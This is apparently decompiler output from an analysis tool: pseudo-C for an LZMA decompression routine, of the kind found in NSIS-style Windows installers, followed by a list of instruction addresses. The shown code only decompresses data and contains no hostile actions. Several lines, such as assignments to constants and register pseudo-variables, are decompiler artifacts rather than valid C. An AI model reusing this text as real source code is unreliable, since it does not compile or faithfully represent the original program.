				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406BD6))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406194
0x0040619b
0x004061a1
0x004061a7
0x00000000
0x004061ab
0x004061b7
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061cd
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e2
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x0040622d
0x00406230
0x00406258
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406232
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624a
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a1
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062a6
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c3
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x00406309
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b1
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069e7
0x004069ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004069f0
0x004069f0
0x004069f4
0x00406ba3
0x00000000
0x00406ba3
0x00406a00
0x00406a07
0x00406a0f
0x00406a0f
0x00406a0f
0x00406a12
0x00406a15
0x00406a15
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x00000000
0x004063c0
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x004063a3
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x00000000
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x00000000
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x00000000
0x0040670b
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
